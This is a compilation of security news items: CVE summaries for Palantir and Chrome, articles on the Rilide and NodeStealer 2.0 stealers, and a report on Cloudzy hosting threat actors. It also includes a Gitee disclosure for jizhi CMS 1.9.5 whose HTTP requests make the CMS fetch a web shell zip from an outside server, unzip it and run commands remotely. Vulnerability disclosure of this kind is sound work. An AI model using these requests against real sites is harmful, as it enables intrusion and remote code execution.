The foundry campaigns service was found to be vulnerable to an unauthenticated information disclosure in a rest endpoint

CVE-2023-30950: Palantir | Trust and Security Portal

An arbitrary file download vulnerability in the /c/PluginsController.php component of jizhi CMS 1.9.5 allows attackers to execute arbitrary code via downloading a crafted plugin.

  
Vulnerability lies in http://127.0.0.1/admin.php/Index/index.html  
Extension management at, download location for plugin list  
  
Click on any plugin of the cloud plugin to download  
Burp Suite Packet capture  
  
Can test parameters download\_url  
  
VPS enables HTTP service  
  
Zip compress phpshell.php and upload to VPS  
  
  
  
Successfully caused any file download  
POC:  
POST /admin.php/Plugins/update.html HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 86  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://127.0.0.1  
Referer: http://127.0.0.1/admin.php/Plugins/index.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09  
Connection: close

action=start-download&filepath=jzdesign&download\_url=http://119.91.26.244:8090/phpshell.zip

Vulnerability source code analysis:  
Global search for start-download to determine the location of file vulnerabilities  
The vulnerability is located in /A/c/PluginsController.php  
  
  
Line 739 starts with a case statement, followed by an fwrite write operation  
  
Located on line 718, its controllable point is $download\_ url, the path for writing has been provided on line 721, so why can I download any file? The cause of the vulnerability lies in  
  
Starting from line 883, it is the default file download URL, but causing a change after the controllable $download\_url on line 891, resulting in the vulnerability function being curl\_ exec, due to a vulnerability in the curl resource request code, it is possible to arbitrarily request external resources and cause arbitrary file downloads

The function point that can be decompressed is located in the case statement 'file-upzip' on line 776  
  
It will determine whether the file exists. If it exists, it will be saved in A/exts/, and the function will be called get\_zip\_orginalsize to start decompression work  
  
While loop to extract each file  
  
Successfully decompressed  
POC:  
POST /admin.php/Plugins/update.html HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 32  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://127.0.0.1  
Referer: http://127.0.0.1/admin.php/Plugins/index.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09  
Connection: close

action=file-upzip&filepath=jzdesign

Access path is http://127.0.0.1/A/exts/phpshell.php  
  
Successfully executing command causing RCE

CVE-2023-38948: jizhi CMS 1.9.5 has a Arbitrary File Download RCE  vulnerability via /A/c/PluginsController.php · Issue #I7LI4E · Pwn师傅/Pwn - Gitee.com

Cybersecurity researchers have discovered a new version of malware called Rilide that targets Chromium-based web browsers to steal sensitive data and steal cryptocurrency.
"It exhibits a higher level of sophistication through modular design, code obfuscation, adoption to the Chrome Extension Manifest V3, and additional features such as the ability to exfiltrate stolen data to a Telegram channel

Browser Security / Malware

Cybersecurity researchers have discovered a new version of malware called **Rilide** that targets Chromium-based web browsers to steal sensitive data and steal cryptocurrency.

"It exhibits a higher level of sophistication through modular design, code obfuscation, adoption to the Chrome Extension Manifest V3, and additional features such as the ability to exfiltrate stolen data to a Telegram channel or interval-based screenshot captures," Trustwave security researcher Pawel Knapczyk said in a report shared with The Hacker News.

Rilide was first documented by the cybersecurity company in April 2023, uncovering two different attack chains that made use of Ekipa RAT and Aurora Stealer to deploy rogue browser extensions capable of data and crypto theft. It's sold on dark web forums by an actor named "friezer" for $5,000.

The malware is equipped with a wide range of features that allow it to disable other browser add-ons, harvest browsing history and cookies, collect login credentials, take screenshots, and inject malicious scripts to withdraw funds from various cryptocurrency exchanges.

The updated version also overlaps with malware tracked by Trellix under the name CookieGenesis, with the extension now making use of Chrome Extension Manifest V3, a controversial application programming interface (API) change introduced by Google that aims to curtail broad access given to extensions.

"With security in mind, one of the new major improvements is that extensions can't load remote JavaScript code and execute arbitrary strings," Knapczyk explained. "Specifically, all logic must be included in the extension package thus allowing the more reliable and effective review process for the extensions submitted to the Chrome Web Store."

This has led to a complete refactor of Rilide's core capabilities, Trustwave said, adding the malware relies on the use of inline events to execute malicious JavaScript code.

Two Rilide artifacts detected in the wild have been found to impersonate Palo Alto Networks' GlobalProtect app to deceive unsuspecting users into installing the malware as part of three different campaigns. One set of attacks are designed to singled out users in Australia and the U.K.

It's suspected that the threat actors use bogus landing pages hosting legitimate AnyDesk remote desktop software and employ vishing tactics to guide potential targets to install the application, and subsequently leverage the remote access to deploy the malware.

Another significant update to the modus operandi involves the use of a PowerShell loader to modify the browser's Secure Preferences file – which keeps the state of a user's personal browsing experience – to launch the application with the extension loaded permanently.

A further analysis of the command-and-control (C2) domain based on the registrant information shows a connection to a larger pool of websites, many of which have been observed serving malware such as Bumblebee, IcedID, and Phorpiex.

It's worth noting that source code of the Rilide extension was leaked in February 2023, raising the possibility that threat actors other than the original author might have picked up the development efforts.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Version of Rilide Data Theft Malware Adapts to Chrome Extension Manifest V3

Inappropriate implementation in Extensions in Google Chrome prior to 115.0.5790.170 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: Medium)

CVE-2023-4078: Stable Channel Update for Desktop

Use after free in Cast in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4075

Use after free in Blink Task Scheduling in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4074

Type Confusion in V8 in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4070

Type Confusion in V8 in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4069

By Deeba Ahmed
NodeStealer 2.0 is a variant of the NodeStealer infostealing malware, which was taken down by Meta in May 2023.
This is a post from HackRead.com Read the original post: NodeStealer 2.0 Poses as ‘Microsoft’ to Hack Facebook and Browser Data

**IN SUMMARY**

1.  **Palo Alto Networks’ Unit 42 identified and reported NodeStealer 2.0.**
2.  **The Python-based malware steals crypto, Facebook and browser data.**
3.  **It spreads through phishing, masquerading as advertising opportunities.**
4.  **NodeStealer 2.0 campaign originated in Vietnam.**

Phishing scams targeting Facebook business accounts to conduct advertising frauds or account takeovers are on the rise, which is a concerning trend. Recently Hackread published MalwareBytes’ Jerome Segura’s **research** on fake Meta ad managers and Chrome extensions allowing attackers to lure business account holders into making ad investments to increase sales revenues.

Now Palo Alto Networks’ Unit 42 researchers have **shared** details of a new phishing attack distributing a brand-new version of a deadly information stealer NodeStealer. This new version is dubbed NodeStealer 2.0, which also targets Facebook business accounts. Researchers believe this trend of targeting Facebook business accounts started in July 2022 with the emergence of the **Ducktail infostealer**. 

NodeStealer malware was detected and taken down by Meta in May 2023. It could steal browser cookies to hijack Facebook business accounts, commendably perform ad frauds, steal account credentials and download additional payloads, etc.

In this campaign, the attack chain starts with a phishing lure, for instance, offering tools like spreadsheet templates for businesses. Previously, we have seen **ChatGPT-inspired scams** offering malicious extensions to business account users. 

NodeStealer 2.0r is similar to its predecessor, using phishing tactics to lure users and distributing malware-infected executable files in the guise of advertising opportunities. Victims are lured into downloading a .ZIP file from reputable Cloud file storage providers to gain their trust, but they get their devices infected.

Screenshot of a Facebook phishing scam tricking users into downloading .ZIP file (Screenshot: Palo Alto Networks’ Unit 42)

According to Unit 42’s **report**, NodeStealer 2.0 has additional features such as downloader and cryptocurrency stealing capabilities and a complete takeover of Facebook business accounts. The first attack in which NodeStealer 2.0 was used was discovered in December 2022, mainly targeting Facebook pages.

It is worth noting that both versions (named by Unit 42 as Variant 1 and Variant 2) are written in Python language. NodeStealer 2.0 posed as Microsoft Corporation and can steal emails, Facebook accounts, and even boasts anti-analysis features.

> The second variant of the infostealer in the campaign was internally named MicrosofOffice.exe and was compiled with Nuitka, the same as the first variant. Unlike the first variant, it does not generate a lot of activity visible to the unsuspecting user. For this variant, the threat actor used the product name “Microsoft Coporation” (originally misspelled by the malware authors).
> 
> Lior Rochberger – Palo Alto Networks’ Unit 42

NodeStealer 2.0 campaign originated in Vietnam, and as per researchers, it is no more active. The Vietnamese link was identified because previous campaigns involving **Ducktail and NodeStealer** were launched by threat actors based in Vietnam. 

Malware seen stealing passwords from a targeted browse (Screenshot: Palo Alto Networks’ Unit 42)

However, it could be part of a larger campaign where attackers are using different methods to target Facebook business account holders for monetary gains. NodeStealer 2.0 seems a continuation of the same agenda, which can cause huge financial losses for organizations, and users get exposed to additional threats due to credential leaks, apart from reputational damage.

Visit this link to check out the **indicators of compromise**. This is becoming a raging threat; therefore, organizations and Facebook business account holders must remain cautious while downloading executables. Using strong passwords with MFA and training employees to detect phishing lures can prove crucial in safeguarding your privacy and data on social media.

**RELATED ARTICLES**

1.  Fake ChatGPT Extension Hijacks Facebook Accounts
2.  Phishers Now Actively Automating Scams with Telegram
3.  Alert: Scammers Pose as ChatGPT in New Phishing Scam
4.  Fake ChatGPT, AI pages on Facebook spread infostealers
5.  Fake Facebook Profiles, Google Ads Pushing Sys01 Stealer

NodeStealer 2.0 Poses as ‘Microsoft’ to Hack Facebook and Browser Data

By Deeba Ahmed
Cloudzy is registered in the United States, and its CEO is an Iranian national.
This is a post from HackRead.com Read the original post: Cloud Service Provider Cloudzy Accused of Aiding Ransomware and APTs

**In Summary**

1.  **Report by Halcyon, a Texas-based cybersecurity startup.**
2.  **Cloudzy is registered in the USA but based in Iran.**
3.  **Cloudzy is suspected of providing C&C services to govt hacking groups.**
4.  **CEO Hannan Nozari denies services to cybercriminals.**

The cybersecurity researchers at Halcyon claim that Cloudzy, a cloud service provider, is actively involved in providing command-and-control services to more than 20 hacking groups.

These groups encompass spyware and ransomware operators, as well as state-backed APT groups. Shockingly, approximately 40% – 60% of Cloudzy’s activities are deemed “malicious in nature,” involving activities such as espionage and extortion against its victims.

**The Cloudzy Saga**

Cybersecurity startup Halcyon researchers discovered that an Iranian-run ISP has been “unwittingly” supporting the “ransomware economy” and miscellaneous attack operations by providing C2P (Command-and-Control Providers) services to threat actors.

> Halcyon researchers suggest there is yet another player that is, perhaps unwittingly, supporting the booming ransomware economy and other attack operations: the Command-and-Control Providers (C2P) who sell services to threat actors while assuming a legal business profile.
> 
> Halcyon

Researchers suspect that the company, identified as Cloudzy (formally RouterHosting), sells services to state-sponsored APT (advanced persistent threat) actors and cybercriminals/hackers while keeping a “legal business profile.”

In a research report (PDF) published on August 1st, the Halcyon Research team wrote that Cloudzy is registered in the USA, but it operates from outside of Tehran, Iran, and has virtually no presence in the USA.

An individual identified as Hannan Nozari runs this company, allegedly the founder of another Iranian firm abrNOC. This is based on the finding that eight individuals employed by Cloudzy in Iran also work for abrNOC.

“Halcyon therefore assessed with high confidence that C2P Cloudzy is almost certainly a cutout for the actual hosting company, abrNOC, operating out of Tehran, Iran,” researchers confirmed.

**Cloudzy Supporting Nation-State Actors**

Halcyon researchers conducted a thorough assessment of Cloudzy’s activities over a three-month period before releasing their report. According to their analysis, Cloudzy not only provided command-and-control (C2P) services to threat actors worldwide, disguising them as anonymity-based services, but it also demonstrated an alarming lack of response when informed about malicious activities.

This lack of response strongly suggests that Cloudzy was actively aiding threat actors. Even more concerning is the discovery that its attack infrastructure was closely tied to government-backed hacking groups from various countries, including the following:

*   Iran
*   India
*   China
*   Russia
*   Vietnam
*   Pakistan
*   North Korea

In addition to its government ties, Cloudzy was found to have links with sanctioned spyware vendors, including the Israeli spyware vendor Candiru, who came to the limelight last year for using Chrome 0-day to target journalists.

Cloudzy allegedly also provided its services to infamous ransomware gangs such as Ghost Clown and Space Kook. Notorious cybercriminals were also found to be connected to the service.

Complete list of APT groups that Cloudzy is allegedly providing services to (Screenshot credit: Halcyon )

**Halcyon Shares Shocking Evidence Against Cloudzy**

In its report, Halcyon provided hard facts against Cloudzy. For instance, researchers noted that the company never verified its customers’ identities and got registered with just a working email address. Over half of its hosted servers were discovered supporting malicious activities directly on infrastructure loaned from a dozen different ISPs. 

Moreover, it accepts cryptocurrency payments from users wanting to anonymously use its Remote Desktop Protocol (RDP) Virtual Private Server (VPS) services. Its T&C policy prohibits it from getting involved in illegal activities, but the ISP services provider has allowed abusers to continue operations for a nominal fee.

**Cloudzy’s Response**

Cloudzy’s CEO Nozari has refuted Halcyon’s claims, stating that only 2% of its clients were malicious and that the company cannot be held responsible for having such clients. Talking to Reuters, Nozari explained that he is doing everything to get rid of such clients, but the firm should not be blamed if its services are being abused.

“If you are a knife factory, are you responsible if someone misuses the knife?” the CEO explained his stance in a LinkedIn exchange.

Nozari also explained that his company was registered in the US state of Wyoming because a US domicile is required to register IP addresses in America.

However, Halcyon executive Ryan Golden refuses to back down, claiming that his researchers tracked Cloudzy’s digital footprints by renting its servers and examining the social media pages of its employees before publishing the report.

Cybersecurity firm CrowdStrike stated that it never observed any state-sponsored actor using Cloudzy, but many other cybercriminals use it, and its operational base is definitely unclear.

**RELATED ARTICLES**

1.  Feds seize VPN service used by hackers in cyber attacks
2.  Free VPN Service SuperVPN Exposes 360 Million User Records
3.  Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps
4.  US Warns Firms About North Korean Hackers Posing as IT Workers
5.  Microsoft-Signed Drivers Helped Hackers Breach System Defenses

Tag

#chrome